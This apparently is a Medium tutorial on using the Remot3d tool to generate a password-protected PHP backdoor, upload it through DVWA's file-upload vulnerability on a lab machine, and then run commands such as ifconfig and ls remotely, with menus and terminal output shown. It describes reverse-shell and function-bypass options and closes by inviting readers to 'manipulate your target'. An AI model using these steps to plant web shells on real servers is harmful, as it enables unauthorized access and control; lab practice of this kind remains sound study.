Build your own PHP Remote Backdoor

ATTACKER :-

Remot3d Installation :-

@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@@ @@! @@@ @@! @@! @@! @@! @@! @@@ @@! @@@ @@! @@@ !@! @!@ !@! !@! !@! !@! !@! @!@ !@! @!@ !@! @!@ @!@!!@! @!!!:! @!! !!@ @!@ @!@ !@! @!! @!@!!@ @!@ !@! !!@!@! !!!!!: !@! ! !@! !@! !!! !!! !!@!@! !@! !!! !!: :!! !!: !!: !!: !!: !!! !!: !!: !!: !!! :!: !:! :!: :!: :!: :!: !:! :!: :!: :!: !:! :: ::: :: :::: ::: :: ::::: :: :: :: :::: :::: :: : : : : :: :: : : : : : : : : : :: : : -------------------------------------- PHP REMOTE BACKDOOR - BY B1P0L4R[+] Options : 
└[-] 1. Generate Backdoor
└[-] 2. Generate Reverser Shell (with iMap Disable Function Bypass)
└[-] 3. Bypass Read /etc/passwd (with unique logic)
└[-] 4. Remote your Backdoor (Just for Option 1)
┌[+] Choose the options
└[root@indoxploit]:#
  • Above are the options which are used in creating backdoors.
  • Type 1
┌[+] Choose the options └[root@indoxploit]:~# 1__----_ /##| \ /###| | \______ |####| \ |####| ___ ___|© \####/ _____ / \### / =====ÊšçØ ╔═╗┬ ┬┌─┐ ╦═╗┌─┐┌┬┐┌─┐┌┬┐┌─┐ // / \ ╠═╝├─┤├─┘ ╠╦╝├┤ ││││ │ │ ├┤ // | |_ \ ╩ ┴ ┴┴ ╩╚═└─┘┴ ┴└─┘ ┴ └─┘ // But it's useless ! \___/ | ╔╗ ╔═╗╔═╗╦╔═╔╦╗╔═╗╔═╗╦═╗ // you can't control his heart \ / ╠╩╗╠═╣║ ╠╩╗ ║║║ ║║ ║╠╦╝ // | |__|__ ╚═╝╩ ╩╚═╝╩ ╩═╩╝╚═╝╚═╝╩╚═ // (______)___) Version 2.0 - Stable[+] Set Your Backdoor Name : backdoor.pbp
  • Then type backdoor name backdoor.php
  • Then enter the password : 123456
[+] Set Your Backdoor Password : 123456 
└[-] Success Generating Backdoor on /home/user/Downloads/Remot3d/backdoor.pbp
  • Backdoor will save in current directory of Remot3d.
  • Now this backdoor.php is required to uploaded to vulnerable server, which in our case is DVWA. We will use upload vulnerability in DVWA to upload this backdoor.php
  • For testing upload backdoor in DVWA. Go to browser and open dvwa. Type 192.168.1.105. Enter username : admin & password : password
  • After opening DVWA, click on Upload. Then go to Remot3d location & select the backdoor.php file.
  • After uploading the file. Go to terminal type ./Remot3d
  • Type 4
[+] Options : 
└[•] 1. Generate Remote Backdoor
└[•] 2. Generate Reverser Shell (with iMap Disable Function Bypass)
└[•] 3. Bypass Server Firewall (with FUD Backdoor Script)
└[•] 4. Remote your Backdoor (Just for Option 1)
┌[+] Choose the options└[root@indoxploit]:~# 4
[ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ] [!] Backdoor Alive… Processing for Connect [+] Your Public IP : 47.5.27.25 [+] System Info :Notice: Undefined index: pwd in /opt/lampp/htdocs/hackable/uploads/backdoor3.php on line 1Linux dvwa #41-Ubuntu SMP Thu Aug 19 01:12:52 UTC 2010 i686 unknown GNU/Linux [+] User ID :Notice: Undefined index: pwd in /opt/lampp/htdocs/hackable/uploads/backdoor3.php on line 1uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ][+] COMMAND : ifconfigNotice: Undefined index: pwd in /opt/lampp/htdocs/hackable/uploads/backdoor3.php on line 1eth0 Link encap:Ethernet HWaddr 00:0c:29:33:5d:c2 inet addr:192.168.1.105 Bcast:192.168.1.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fe33:5dc2/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1035 errors:0 dropped:0 overruns:0 frame:0 TX packets:383 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:106710 (106.7 KB) TX bytes:267977 (267.9 KB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:68 errors:0 dropped:0 overruns:0 frame:0 TX packets:68 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0RX bytes:5440 (5.4 KB) TX bytes:5440 (5.4 KB)
  • Type ls will display current files in server.
[+] COMMAND : lsNotice: Undefined index: pwd in /opt/lampp/htdocs/hackable/uploads/backdoor3.php on line 1backdoor backdoor2 backdoor3.php backdoor4.php dvwa_email.pngtest
  • Now you can manipulate your target. If target is having above vulnerability.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store